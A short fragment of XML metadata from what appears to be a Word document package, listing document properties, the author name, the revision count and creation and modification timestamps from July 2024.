  <DocSecurity>0</DocSecurity>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop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武杰 林</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>武杰 林</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-28T10:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-28T10:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>